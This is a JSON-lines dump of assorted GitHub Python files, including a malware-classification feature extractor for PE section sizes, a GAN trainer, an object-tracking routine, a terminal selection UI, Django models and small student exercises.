regexp_ss:\n sect_ss = int(regexp_ss.group(1))\n # TODO: find more clever similarity function\n if sect_ss != 0:\n sim = float(sect_dict[section_name + '_vs'][idx] - sect_ss)/sect_ss\n sect_dict[section_name + '_vsrs_sim'][idx] = sim\n progress_bar(idx+1, total_files, 50)\n\n \n sections_pd = pd.DataFrame.from_dict(sect_dict)\n sections_pd.to_csv('results/section_features.csv', index=False)\n save_obj(sections_pd, 'section_features')\n return sections_pd\n\n\n# Create a dictionary with keys corresponding to each valid sections, in order to\n# count number of occurences and percentage of each section.\ndef sections_dict_initialization():\n # extract_sections_labels() should be executed prior to this command\n sections_list = load_obj('sections')\n # extract_vsrs_sections() should be executed prior to this commad\n vsrs_set = set(load_obj('vsrs_sections'))\n vsrs_sections = list(vsrs_set.intersection(set(pe_sections))) \n sections_vs = [s + '_vs' for s in vsrs_sections]\n sections_perc = [s + '_vsperc' for s in vsrs_sections]\n sections_lines = [s + '_linesperc' for s in sections_list]\n # TODO: calculate the similarity between VS and raw size maybe?? \n # a similarity function implemented in the difference of virtual size and raw size\n sections_sim = [s + '_vsrs_sim' for s in vsrs_sections]\n sections_features = sections_vs + sections_perc + sections_lines + sections_sim\n sect_dict = dict((k, []) for k in sections_features)\n return sect_dict\n\n\ndef extract_segments(): \n train_labels = pd.read_csv(trainLabels)\n files_list = train_labels['Id'].tolist()\n extract_legit_sections(files_list)\n extract_vsrs_sections(files_list)\n sect_dict = sections_dict_initialization()\n extract_sections_info(sect_dict, files_list)\n\nexract_segments()\n","repo_name":"dlekkas/malware_classification","sub_path":"src/feature_eng/extract_sections.py","file_name":"extract_sections.py","file_ext":"py","file_size_in_byte":8782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"28625341368","text":"#WAP to perform basic arithmetic operation on two number by choice.\nnum1 = input('Enter first number: ') \nnum2 = input('Enter second number: ') \nchoice = int(input('choice :-\\nsum : 1 \\tsub : 2\\nmul : 3 \\tdiv : 4\\n'))\nsum = float(num1) + float(num2)\nmin = float(num1) - float(num2) \nmul = float(num1) * float(num2) \ndiv = float(num1) / float(num2) \nif choice == 1 :\n print('The sum of {0} and {1} is {2}'.format(num1, num2, sum)) \nelif choice ==2:\n print('The subtraction of {0} and {1} is {2}'.format(num1, num2, min))\nelif choice ==3:\n print('The multiplication of {0} and {1} is {2}'.format(num1, num2, mul)) \nelif choice ==4 : \n print('The division of {0} and {1} is {2}'.format(num1, num2, div)) \n# Output:\n# Enter first number: 56\n# Enter second number: 87 \n# choice :-\n# sum : 1 sub : 2\n# mul : 3 div : 4\n# 4\n# The division of 56 and 87 is 0.6436781609195402\n","repo_name":"vikassharmanaini/python-lab-file","sub_path":"24.py","file_name":"24.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"84834109","text":"class Solution:\r\n def maxProfit(self, prices: List[int]) -> int:\r\n buy = 10001\r\n sell = 0\r\n\r\n for i in prices:\r\n if buy > i: # 지금 구매한가격보다 더 싼 가격이면\r\n buy = i\r\n\r\n if sell < i - buy: # 기존 이익보다 지금 팔때 이익이 더 크면\r\n sell = i - buy\r\n\r\n return sell","repo_name":"Areum0921/Abox","sub_path":"LeetCode/121. Best Time to Buy and Sell Stock.py","file_name":"121. Best Time to Buy and Sell Stock.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"28238414283","text":"#/usr/bin/python3\n\n# http://www.compjour.org/warmups/govt-text-releases/intro-to-bs4-lxml-parsing-wh-press-briefings/\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nurl = 'http://sandiego.craigslist.org/search/sof'\nresp = requests.get(url)\nsoup = BeautifulSoup(resp.text, 'lxml')\n\nurls = []\nfor h in soup.find_all('li'):\n a = h.find('a')\n urls.append(a.attrs['href'])","repo_name":"jamie082/href_xml","sub_path":"href_xml.py","file_name":"href_xml.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28779879085","text":"#!/usr/bin/env python3\n\"\"\"\nmain file\n\nentry point for running assignment 1\n\"\"\"\n\nimport pandas as pd\nfrom loguru import logger\nfrom data import get_data\nfrom analyze import analyze\n\n\ndef initialize() -> None:\n \"\"\"\n initialize config\n \"\"\"\n pd.set_option('mode.chained_assignment', None)\n\n\ndef main() -> None:\n \"\"\"\n main entry point for program\n \"\"\"\n initialize()\n moon_data = get_data()\n logger.info(f'sample of data:\\n\\n{moon_data.head()}')\n logger.info(f'data columns: {moon_data.columns}')\n\n analyze(moon_data, 20)\n analyze(moon_data, 4)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jschmidtnj/astronomy","sub_path":"lab1/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42503992869","text":"from Bio import Entrez\n\nID = 12890024\nOUTPUT = \"result/seq_from_paper.fasta\"\nEntrez.email = \"Your.Name.Here@example.org\"\n\n\ndef download_seq(paper_id, *, output_file, rettype=\"fasta\", retmax=10):\n with Entrez.elink(dbfrom=\"pubmed\", db=\"nucleotide\", id=paper_id,\n linkname=\"pubmed_nuccore\", retmax=retmax) as handle,\\\n open(output_file, \"w\") as output:\n record = Entrez.read(handle)\n ids = []\n for v in record[0][\"LinkSetDb\"][0][\"Link\"]:\n ids.extend(v.values())\n with Entrez.efetch(db=\"nucleotide\", id=ids, rettype=rettype, retmode=\"text\", retmax=retmax) as handle:\n output.write(handle.read())\n\n\nif __name__ == '__main__':\n download_seq(ID, output_file=OUTPUT)\n","repo_name":"ArtyomKaltovich/Phylo","sub_path":"hw2/task1/download_seq_by_paper.py","file_name":"download_seq_by_paper.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32428535912","text":"\"\"\"\nAuthor: Atahan Kucuk\nAssignment: 06.2 - Rock Paper Scissors\nDate: 10/18/2021\n\nDescription:\n It is an simple application that allows users to play rock paper scissors\n\n\n\"\"\"\nimport random as r\n#generating computer choice\ndef get_computer_choice():\n comp= ['rock', 'paper','scissors']\n return r.choice(comp)\n#getting the user input\ndef get_player_choice():\n player = input('Choose rock, paper, or scissors: ')\n #validating user input\n while player == 'rock' or player == 'paper' or player =='scissors':\n return player\n else:\n print('You made an invalid choice. Please try again.')\n player = input('Choose rock, paper, or scissors: ')\n return player\n#determing the winner\ndef get_winner(comp, player):\n status = ' '\n \n if comp == player:\n print(' Its a tie. Starting over.')\n status = 'tie'\n elif comp == 'paper' and player == 'rock':\n print(' paper beats rock')\n status = 'computer'\n elif comp == 'rock' and player == 'paper':\n print(' paper beats rock')\n status = 'player'\n elif comp == 'scissors' and player == 'paper':\n print(' scissors beats paper')\n status = 'computer'\n elif player == 'scissors' and comp == 'paper':\n print(' scissors beats paper')\n status = 'player'\n elif comp == 'rock' and player == 'scissors':\n print(' rock beats scissors')\n status = 'computer'\n elif player == 'rock' and comp == 'scissors':\n print(' rock beats scissors')\n status = 'player'\n return status\n\ndef main():\n #storing the choices\n comp = get_computer_choice()\n player = get_player_choice()\n print(' The computer chose '+comp+', and you chose '+player+'.')\n win = get_winner(comp,player)\n #comparing the chocies to determine who wins or who loose\n while win == 'tie':\n \n comp = get_computer_choice()\n player = get_player_choice()\n win = get_winner(comp,player)\n print(' The computer chose '+comp+', and you chose '+player+'.')\n if win == 'computer': \n print(' You lost. Better luck next time.')\n if win == 'player':\n print(' You won the game!')\n print('Thanks for playing.')\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"atahan99/Python-Coding-Lab","sub_path":"6th/rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21159501919","text":"\nimport os\nimport torch\n\nfrom .base_trainer import BaseTrainer\nfrom .utils.init_utils import init_optim\nfrom .utils.gan_utils import *\nfrom .utils.report_utils import *\n\n\nclass GANTrainer(BaseTrainer):\n \"\"\"A trainer for a GAN.\"\"\"\n\n def __init__(self, model, dataset,\n D_optim_config={},\n G_optim_config={},\n D_iters=5,\n clamp=0.01,\n gp_coeff=10.0,\n generate_grid_interval=200,\n **kwargs):\n \"\"\"\n Initializes GANTrainer.\n\n Note:\n Optimizer's configurations/parameters must be passable to the\n optimizer (in torch.optim). It should also include a parameter\n `optim_choice` for the choice of the optimizer (e.g. \"sgd\" or \"adam\").\n\n Args:\n model: The model.\n dataset: The dataset.\n D_optim_config: Configurations for the discriminator's optimizer.\n G_optim_config: Configurations for the generator's optimizer.\n D_iters: Number of iterations to train discriminator every batch.\n clamp: Range on which the discriminator's weight will be clamped after each update.\n gp_coeff: A coefficient for the gradient penalty (gp) of the discriminator.\n generate_grid_interval: Check progress every `generate_grid_interval` batch.\n \"\"\"\n super().__init__(model, dataset, **kwargs)\n\n self.D_iters = D_iters\n self.clamp = clamp\n self.gp_coeff = gp_coeff\n self.generate_grid_interval = generate_grid_interval\n\n # Initialize optimizers for generator and discriminator\n self.D_optim = init_optim(self.model.D.parameters(), **D_optim_config)\n self.G_optim = init_optim(self.model.G.parameters(), **G_optim_config)\n\n # Initialize list of image grids generated from a fixed latent variable\n grid_size = 8 * 8\n self._fixed_latent = torch.randn([grid_size, self.model.num_latents], device=self.device)\n self._generated_grids = []\n\n\n #################### Training Methods ####################\n\n def train_step(self):\n \"\"\"\n Makes one training step.\n Throughout this doc, we will denote a sample from the real data\n distribution, fake data distribution, and latent variables respectively\n as follows:\n x ~ real, x_g ~ fake, z ~ latent\n\n Now recall that in order to train a GAN, we try to find a solution to\n a min-max game of the form `min_G max_D V(G,D)`, where G is the generator,\n D is the discriminator, and V(G,D) is the score function.\n For a regular GAN, V(G,D) = log(D(x)) + log(1 - D(x_g)),\n which is the Jensen-Shannon (JS) divergence between the probability\n distributions P(x) and P(x_g), where P(x_g) is parameterized by G.\n\n When it comes to Wasserstein GAN (WGAN), the objective is to minimize\n the Wasserstein (or Earth-Mover) distance instead of the JS-divergence.\n See Theorem 3 and Algorithm 1 in the original paper for more details.\n We can achieve that (thanks to the Kantorovich-Rubinstein duality)\n by first maximizing `D(x) - D(x_g)` in the space of 1-Lipschitz\n discriminators D, where x ~ data and x_g ~ fake.\n Then, we have the gradient wrt G of the Wasserstein distance equal\n to the gradient of -D(G(z)).\n Since we assumed that D should be 1-Lipschitz, we can enforce\n k-Lipschitzness by clamping the weights of D to be in some fixed box,\n which would be approximate up to a scaling factor.\n\n Enforcing Lipschitzness is done more elegantly in WGAN-GP,\n which is just WGAN with gradient penalty (GP). The gradient penalty\n is used because of the statement that a differentiable function is\n 1-Lipschitz iff it has gradient norm equal to 1 almost everywhere\n under P(x) and P(x_g). Hence, the objective will be similar to WGAN,\n which is `min_G max_D of D(x) - D(x_g)`, but now we add the gradient\n penalty in the D_step such that it will be minimized.\n\n Links to the papers:\n GAN: https://arxiv.org/pdf/1406.2661.pdf\n WGAN: https://arxiv.org/pdf/1701.07875.pdf\n WGAN-GP: https://arxiv.org/pdf/1704.00028.pdf\n \"\"\"\n\n for _ in range(self.D_iters):\n # Sample real data from the dataset\n sample = self.sample_dataset()\n real = sample[\"before\"].to(self.device)\n\n # Sample latent and train discriminator\n latent = self.sample_latent()\n D_results = self.D_step(real, latent)\n\n # Sample latent and train generator\n latent = self.sample_latent()\n G_results = self.G_step(latent)\n \n # Record data\n self.add_data(**D_results, **G_results)\n results = {**D_results, **G_results}\n losses = {k: v for k, v in results.items() if k.find(\"loss\") != -1}\n D_evals = {k: v for k, v in results.items() if k.find(\"D_on\") != -1}\n self.writer.add_scalars(\"losses\", losses, self.iters)\n self.writer.add_scalars(\"D_evals\", D_evals, self.iters)\n\n\n def D_step(self, real, latent):\n \"\"\"\n Makes a training step for the discriminator of the model.\n\n Args:\n real: Sample from the dataset.\n latent: Sample from the latent space.\n\n Returns:\n D loss and evaluation of D on real and on fake.\n \"\"\"\n\n D, G = self.model.D, self.model.G\n\n # Zero gradients\n self.D_optim.zero_grad()\n\n # Sample fake data from a latent (ignore gradients)\n with torch.no_grad():\n fake = G(latent)\n\n # Classify real and fake data\n D_on_real = D(real)\n D_on_fake = D(fake)\n\n # Calculate loss and its gradients\n D_loss = get_D_loss(D, real, fake, gan_type=self.model.gan_type, gp_coeff=self.gp_coeff)\n D_loss.backward()\n\n # Calculate gradients and minimize loss\n self.D_optim.step()\n\n # If WGAN, clamp D's weights to ensure k-Lipschitzness\n if self.model.gan_type == \"wgan\":\n [p.data.clamp_(*clamp) for p in D.parameters()]\n\n return {\n \"D_loss\": D_loss.mean().item(),\n \"D_on_real\": D_on_real.mean().item(),\n \"D_on_fake1\": D_on_fake.mean().item()\n }\n\n\n def G_step(self, latent):\n \"\"\"\n Makes a training step for the generator of the model.\n\n Args:\n latent: Sample from the latent space.\n \n Returns:\n G loss and evaluation of D on fake.\n \"\"\"\n\n D, G = self.model.D, self.model.G\n \n # Zero gradients\n self.G_optim.zero_grad()\n\n # Sample fake data from latent\n fake = G(latent)\n\n # Classify fake data\n D_on_fake = D(fake)\n\n # Calculate loss and its gradients\n G_loss = get_G_loss(D, fake, gan_type=self.model.gan_type)\n G_loss.backward()\n\n # Optimize\n self.G_optim.step()\n\n # Record results\n return {\n \"G_loss\": G_loss.mean().item(),\n \"D_on_fake2\": D_on_fake.mean().item(),\n }\n\n\n def sample_latent(self):\n \"\"\"\n Samples from the latent space (i.e. input space of the generator).\n\n Returns:\n Sample from the latent space.\n \"\"\"\n\n # Calculate latent size and sample from normal distribution\n latent_size = [self.batch_size, self.model.num_latents]\n latent = torch.randn(latent_size, device=self.device)\n\n return latent\n\n\n #################### Reporting and Tracking Methods ####################\n\n\n def stop(self):\n \"\"\"\n Stops the trainer and report the result of the experiment.\n \"\"\"\n\n losses = self.get_data_containing(\"loss\")\n evals = self.get_data_containing(\"D_on\")\n\n if not self.save_results:\n plot_lines(losses, title=\"Losses\")\n plot_lines(evals, title=\"Evals\")\n return\n\n # Create experiment directory in the model's directory\n experiment_dir = os.path.join(self.results_dir, self.get_experiment_name())\n\n # Save model\n model_path = os.path.join(experiment_dir, \"model.pt\")\n self.save_model(model_path)\n\n # Plot losses of D and G\n losses_file = os.path.join(experiment_dir, \"losses.png\")\n plot_lines(losses, filename=losses_file, title=\"Losses of D and G\")\n\n # Plot evals of D on real and fake data\n evals_file = os.path.join(experiment_dir, \"evals.png\")\n plot_lines(evals, filename=evals_file, title=\"Evaluations of D on real and fake data\")\n\n # Create an animation of the generator's progress\n animation_file = os.path.join(experiment_dir, \"progress.mp4\")\n create_progress_animation(self._generated_grids, animation_file)\n\n # Write details of experiment\n details_txt = os.path.join(experiment_dir, \"repr.txt\")\n with open(details_txt, \"w\") as f:\n f.write(self.__repr__())\n\n\n def post_train_step(self):\n \"\"\"\n The post-training step.\n \"\"\"\n super().post_train_step()\n\n # Check generator's progress by recording its output on a fixed input\n if should_generate_grid:\n grid = generate_grid(self.model.G, self._fixed_latent)\n self._generated_grids.append(grid)\n self.writer.add_image(\"grid\", grid, self.iters)\n\n\n def report_stats(self, precision=3):\n \"\"\"\n Reports/prints the training stats to the console.\n\n Args:\n precision: Precision of the float numbers reported.\n \"\"\"\n\n report = \\\n \"[{epoch}/{num_epochs}][{batch}/{num_batches}]\\t\" \\\n \"Loss of D = {D_loss:.{p}f}\\t\" \\\n \"Loss of G = {G_loss:.{p}f}\\t\" \\\n \"D(x) = {D_on_real:.{p}f}\\t\" \\\n \"D(G(z)) = {D_on_fake1:.{p}f} / {D_on_fake2:.{p}f}\"\n\n stats = {\n \"epoch\": self.epoch,\n \"num_epochs\": self.num_epochs,\n \"batch\": self.batch,\n \"num_batches\": self.num_batches,\n \"D_loss\": self.get_current_value(\"D_loss\"),\n \"G_loss\": self.get_current_value(\"G_loss\"),\n \"D_on_real\": self.get_current_value(\"D_on_real\"),\n \"D_on_fake1\": self.get_current_value(\"D_on_fake1\"),\n \"D_on_fake2\": self.get_current_value(\"D_on_fake2\"),\n \"p\": precision,\n }\n\n print(report.format(**stats))\n\n","repo_name":"zeligism/PairedCycleGAN","sub_path":"src/trainers/gan_trainer.py","file_name":"gan_trainer.py","file_ext":"py","file_size_in_byte":10488,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"81"} +{"seq_id":"25654489224","text":"import base64\nimport string\n\ndef b64d(s):\n n = 0\n while n < 6:\n try:\n res = base64.b64decode(s + '='*n)\n return res\n except Exception as e:\n try:\n res = base64.urlsafe_b64decode(s + '='*n)\n return res\n except Exception as e:\n pass\n return None\n\ndef rot13(s):\n aLo = string.ascii_lowercase\n aUp = string.ascii_uppercase\n s2 = ''\n for i in s:\n if i in aLo:\n s2 += aLo[(aLo.index(i) + 13)%26]\n elif i in aUp:\n s2 += aUp[(aUp.index(i) + 13)%26]\n else:\n s2 += i\n return s2\n \n \n \n","repo_name":"Gdasl/STT","sub_path":"STTUtils/encoding.py","file_name":"encoding.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"41209553931","text":"# 연결된 영역 레이블링\r\n# 같은 영역 찾아 칠하기\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\nimg = cv2.imread(\"./img/shapes_donut.png\")\r\nimg2 = np.zeros_like(img)\r\n\r\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n_, th = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)\r\n\r\n# 연결된 요소 레이블링 적용\r\n# cv2.connectedComponents(입력 영상)\r\ncnt, labels = cv2.connectedComponents(th)\r\n\r\n# 레이블 개수만큼 순회\r\nfor i in range(cnt):\r\n # 레이블이 같은 영역에 랜덤한 색상 적용\r\n img2[labels==i] = [int(j) for j in np.random.randint(0,255,3)]\r\n \r\nmerged = np.hstack((img,img2))\r\ncv2.imshow(\"connected\", merged)\r\ncv2.waitKey()\r\ncv2.destroyAllWindows()","repo_name":"jso303/OpenCV_Python","sub_path":"Chapter07/connected_label.py","file_name":"connected_label.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18926952380","text":"import numpy as np\nimport cv2, numpy as np, os, pickle\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport grapher\nimport random\nimport functools\nimport make_detections\nimport os\nimport compute_metrics\nimport glob\nimport motmetrics as mm\nimport sys\n\n \ndef colors(n):\n max_value = 16581375 #255**3\n interval = int(max_value / n)\n colors = [hex(I)[2:].zfill(6) for I in range(0, max_value, interval)]\n \n clrs= [(int(i[:2], 16), int(i[2:4], 16), int(i[4:], 16)) for i in colors]\n random.shuffle(clrs)\n return clrs \n\ndef dp_1(detections,c_in,c_ex,c_ij,beta,thr_cost,max_it):\n '''Takes detections in and returns the nodes which form the 1st track'''\n\n c_arr=[]\n for i in range(len(detections['r'])):\n c_arr.append(beta-detections['r'][i])\n detections['c']=c_arr\n\n d_num=len(detections['x'])\n\n print(\"number of detections\",d_num)\n\n detections['dp_c']=[]\n detections['dp_link']=[]\n detections['orig']=[]\n\n min_c = 10000000000000000000000000000000000000000000\n it=0\n k=0\n inds_all=[0 for i in range(100000)]\n id_s =[0 for i in range(100000)]\n redo_nodes=[i for i in range(d_num)]\n\n for i in range(len(redo_nodes)):\n detections['r'][i]*=-1\n detections['dp_c'].append(detections['r'][i]+c_in)\n #print(detections['r'][i])\n detections['dp_link'].append(-1)\n \n print(\"base cases done\")\n tot_min=10000000000000000\n tot_amin=-1\n print(\"DP starting\")\n for i in range(len(redo_nodes)):\n \n mi,amin=c_in,-1\n for node in detections['pr'][i]:\n if detections['dp_c'][node]+detections['r'][i]0:\n detections['dp_c'][i]=10000000000000000000000\n for node in detections['pr'][i]:\n if detections['dp_c'][node]+detections['r'][i]thr_cost:\n break\n final=[]\n cur_ind=tot_amin\n if detections['free'][cur_ind]>0:\n break\n #print(\"Getting path\")\n while cur_ind!=-1:\n final.append(cur_ind)\n detections['free'][cur_ind]=1\n \n #paths.append(final)\n x1,y1=detections['x'][cur_ind],detections['y'][cur_ind]\n x2,y2=x1+detections['w'][cur_ind],y1+detections['h'][cur_ind]\n boxa=[x1,y1,x2,y2]\n if nms:\n for i in range(cur_ind+1,len(detections['x'])):\n if detections['fr'][i]>detections['fr'][cur_ind]:\n break\n x1,y1=detections['x'][i],detections['y'][i]\n x2,y2=x1+detections['w'][i],y1+detections['h'][i]\n boxb=[x1,y1,x2,y2]\n if bb_intersection_over_union(boxa,boxb)>0 and abs(detections['r'][i])0 and abs(detections['r'][i]) \", renderer=None):\n \"\"\"Constructor.\n\n Args:\n terminal (Terminal): the terminal that the UI will be created on\n prompt (str): prompt to use before lines that require user input\n renderer (Renderer or None): renderer to use for showing matches\n on the UI. ``None`` means to use a default renderer created\n by ``create_default_renderer()``..\n \"\"\"\n super(TerminalUI, self).__init__()\n\n # If you are thinking about importing readline to add support for\n # fancy editing, don't. Doing so might add extra ANSI escape\n # sequences on some terminals with some versions of readline, which\n # will screw up the output of selecta. This is apparently a readline\n # bug:\n #\n # https://bugs.python.org/issue19884\n\n self.hit_list_limit = 9\n self.prompt = prompt\n self.renderer = renderer or self.create_default_renderer()\n self.terminal = terminal\n\n def create_default_renderer(self):\n \"\"\"Creates a default MatchRenderer_ that is used to show matches on\n the console.\"\"\"\n return MatchRenderer()\n\n\nclass DumbTerminalUI(TerminalUI):\n \"\"\"Dumb terminal-based UI class for ``selecta``. This UI class does not\n require any special capabilities from the terminal (e.g., raw terminal\n access).\"\"\"\n\n def choose_item(self, initial_query=None):\n matches = self.index.search(initial_query) if initial_query else None\n while True:\n self.show_matches(matches)\n query = self.read_query()\n if query is None:\n return None\n\n match_index = safeint(query, 0)\n if match_index > 0 and match_index <= len(matches):\n return matches[match_index-1]\n\n matches = self.index.search(query)\n\n def read_query(self):\n \"\"\"Reads the query string or the index of the match chosen by the\n user from the standard input.\n\n Returns:\n the query string or the index of the match chosen by the user,\n or ``None`` if the user cancelled the selection by submitting EOF\n \"\"\"\n try:\n return raw_input(self.prompt)\n except KeyboardInterrupt:\n return None\n except EOFError:\n return None\n\n def show_matches(self, matches):\n \"\"\"Shows the given list of matches on the standard output.\"\"\"\n matches = matches or []\n limit = self.hit_list_limit\n\n self.renderer.attach_to_terminal(self.terminal)\n for index, match in enumerate(matches[:limit], 1):\n print(\"{index}: {rendered_match}\".format(\n index=index,\n rendered_match=self.renderer.render(match)\n ))\n if len(matches) > limit:\n print(\"...and {0} more\".format(len(matches) - limit))\n\n\nclass SmartTerminalUI(TerminalUI):\n \"\"\"Smart terminal-based UI class for ``selecta`` that provides a snappier\n user experience but requires raw access to the terminal (which might not\n be available on all platforms).\"\"\"\n\n def __init__(self, terminal, prompt=\"> \", renderer=None):\n super(SmartTerminalUI, self).__init__(terminal, prompt, renderer)\n if not terminal.supports(\"LEFT\", \"RIGHT\", \"UP\", \"DOWN\"):\n raise NotSupportedError(\"SmartTerminalUI requires a terminal that \"\n \"supports cursor movement\")\n self._query = None\n self._ui_shown = False\n self.reset()\n\n def choose_item(self, initial_query=None):\n self.query = initial_query or ''\n while True:\n try:\n char = self.terminal.getch()\n except KeyboardInterrupt:\n return None\n except EOFError:\n return None\n\n if Keycodes.is_enter_like(char):\n return self.selected_item\n elif Keycodes.is_backspace_like(char):\n self.query = self.query[:-1]\n elif char == Keycodes.CTRL_N or char == Keycodes.DOWN:\n self.adjust_selected_index_by(1)\n elif char == Keycodes.CTRL_P or char == Keycodes.UP:\n self.adjust_selected_index_by(-1)\n elif char == Keycodes.CTRL_U:\n self.query = ''\n elif char == Keycodes.CTRL_W:\n self.query = re.sub(\"[^ ]* *$\", \"\", self.query)\n elif char == Keycodes.ESCAPE:\n return None\n elif is_printable(char):\n self.query += char\n else:\n print(\"Unhandled char: {0!r}\".format(char))\n\n def dispose(self):\n self.hide()\n\n def hide(self):\n \"\"\"Hides the UI. This function assumes that the cursor is currently\n in the first row of the UI.\"\"\"\n if not self._ui_shown:\n return\n\n self._hide()\n self._ui_shown = False\n\n def _hide(self):\n self.terminal.move_cursor(x=0)\n self.terminal.clear_to_eos()\n\n def adjust_selected_index_by(self, offset, wrap=True):\n \"\"\"Adjusts the selected index with the given offset, optionally wrapping\n around the result list.\n\n Args:\n offset (int): the offset to add to the selected index\n wrap (bool): whether to wrap around the result list\n \"\"\"\n if self.selected_index is None:\n return\n new_index = int(self.selected_index) + offset\n if wrap:\n new_index = new_index % self.num_visible_matches\n self.selected_index = new_index\n\n @property\n def num_visible_matches(self):\n \"\"\"The number of matches currently visible on the UI.\"\"\"\n return min(len(self._best_matches), self.hit_list_limit)\n\n @property\n def query(self):\n \"\"\"The current query string shown on the UI.\"\"\"\n return self._query\n\n @query.setter\n def query(self, value):\n \"\"\"Sets the current query string shown on the UI.\"\"\"\n # TODO: optimize if the new query string has the old as a prefix\n if value == self._query:\n return\n self._query = value\n self.refresh()\n\n def refresh(self):\n \"\"\"Redraws the UI. Assumes that the cursor is in the row where the\n drawing should start.\"\"\"\n\n num_lines = self.hit_list_limit + 1\n if not self._ui_shown:\n # Ensure that there are enough empty lines at the bottom of the\n # terminal to show the UI\n self.terminal.write(\"\\n\" * num_lines)\n self.terminal.move_cursor(dy=-num_lines)\n self._ui_shown = True\n\n query = self.query\n\n self._best_matches = self.index.search(query) if self.index else []\n if self._best_matches and self._selected_index is None:\n self._selected_index = 0\n self._fix_selected_index()\n\n with self.terminal.hidden_cursor():\n # Draw the matches first\n self.terminal.move_cursor(x=0, dy=1)\n num_lines_printed = self._show_matches(self._best_matches)\n self.terminal.clear_to_eos()\n\n # Now draw the prompt and the query\n self.terminal.move_cursor(x=0, dy=-num_lines_printed-1)\n self.terminal.write(self.prompt, raw=True)\n # TODO: truncate the query from the front if too wide\n self.terminal.write(query, raw=True)\n self.terminal.clear_to_eol()\n\n def reset(self):\n \"\"\"Resets the UI to the initial state (no query, no matches, no\n selection).\"\"\"\n self._best_matches = []\n self._selected_index = None\n self.query = ''\n\n @property\n def selected_index(self):\n \"\"\"Returns the index of the currently selected item on the UI.\"\"\"\n return self._selected_index\n\n @selected_index.setter\n def selected_index(self, value):\n if self._selected_index == value:\n return\n\n self._selected_index = value\n self._fix_selected_index()\n self.refresh()\n\n @property\n def selected_item(self):\n \"\"\"The currently selected item on the UI.\"\"\"\n if self._selected_index is None or self._selected_index < 0:\n return None\n else:\n return self._best_matches[self._selected_index]\n\n def _fix_selected_index(self):\n \"\"\"Ensures that the index of the selected item is within valid\n bounds.\"\"\"\n if not self._best_matches:\n self._selected_index = None\n elif self._selected_index is not None:\n self._selected_index = max(\n 0, min(self._selected_index, self.num_visible_matches)\n )\n\n def _show_matches(self, matches):\n \"\"\"Shows the given list of matches on the terminal.\n\n Returns:\n int: the number of lines printed on the terminal\n \"\"\"\n matches = matches or []\n limit = self.hit_list_limit\n\n self.renderer.attach_to_terminal(self.terminal)\n for index, match in enumerate(matches[:limit]):\n selected = (index == self._selected_index)\n rendered_match = self.renderer.render(match, selected=selected)\n self.terminal.write(rendered_match, raw=True)\n self.terminal.write(\"\\n\")\n\n return min(len(matches), limit)\n","repo_name":"ntamas/python-selecta","sub_path":"selecta/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":11036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"38314425466","text":"from django.db import models\nfrom django.contrib.auth.models import User, AbstractUser\nfrom django.contrib.auth import get_user_model\n\n\nGENDER_CHOICES = (\n ('M', 'Masculino'),\n ('F', 'Femenino'),\n ('O', 'OTRO')\n)\n\nFACULTY_CHOICES = (\n ('FI', 'Facultad de Ingeniería'),\n ('FC', 'Facultad de Ciencias'),\n ('FCA', 'Facultad de Contaduría y Administración'),\n ('FO', 'Facultad de Odontología'),\n ('FA', 'Facultad de Arquitectura'),\n ('FAD', 'Facultad de Artes y Diseño'),\n ('FQ', 'Facultad de Química'),\n ('FD','Facultad de Derecho'),\n ('FCPS', 'Facultad de Ciencias Políticas y Sociales'),\n ('FM','Facultad de Medicina'),\n ('FE', 'Facultad de Economía'),\n ('FMVZ','Facultad de Medicina Veterinaria y Zootecnia'),\n ('FP','Facultad de Psicología'),\n ('FFL', 'Facultad de Filosofía y Letras'),\n)\n\nclass Usuario(AbstractUser):\n nombre = models.CharField(max_length=30)\n genero = models.CharField(max_length= 1, choices=GENDER_CHOICES)\n correo = models.EmailField()\n # otro_correo = models.EmailField()\n facultad = models.CharField(max_length=4, choices=FACULTY_CHOICES)\n fecha_nacimiento = models.DateField(null=True)\n credencial = models.ImageField()\n verificado = models.BooleanField(default=False)\n class Meta(AbstractUser.Meta):\n swappable = 'AUTH_USER_MODEL'\n\n# Create your models here.\n\nclass Pregunta(models.Model):\n id = models.IntegerField(auto_created=True, primary_key=True)\n texto = models.CharField(max_length=100)\n\nclass Respuesta(models.Model):\n id = models.IntegerField(auto_created=True, primary_key=True)\n pregunta = models.ForeignKey(Pregunta, on_delete=models.CASCADE)\n imagen = models.ImageField()\n\nclass Respuesta_Usuario(models.Model):\n id = models.IntegerField(auto_created=True, primary_key=True)\n respuesta = models.ForeignKey(Respuesta, on_delete=models.CASCADE)\n usuario = models.ForeignKey(get_user_model(), on_delete=models.CASCADE)\n imagen = 